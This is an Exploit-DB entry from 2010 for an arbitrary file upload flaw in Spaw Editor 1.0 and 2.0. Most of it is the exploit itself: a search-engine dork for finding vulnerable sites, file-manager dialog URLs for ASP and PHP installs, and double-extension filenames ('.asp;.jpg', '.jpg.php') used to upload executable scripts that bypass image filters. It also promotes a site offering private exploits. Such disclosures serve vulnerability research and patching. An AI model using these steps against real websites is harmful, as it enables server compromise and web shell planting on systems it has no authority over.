Spaw Editor 1.0/2.0 - Arbitrary File Upload

EDB-ID:

12672

CVE:

N/A




Platform:

ASP

Date:

2010-05-20


# Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload .

# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2] 
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]

# Vulnerability: Remote File Upload .

# Part ExplOit & Bug Codes :

Dork [ allinurl:spaw2/dialogs/ ]

Exploit :

For Windows & ASP Sites : 

/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images

/spaw2/uploads/files/sec4ever.asp;.jpg

=====================================

For Linux PHP :

/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files

/spaw2/uploads/files/sec4ever.jpg.php

=====================================

Special Thanks to : Exploit-db Team &  Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits &
 Localz ] .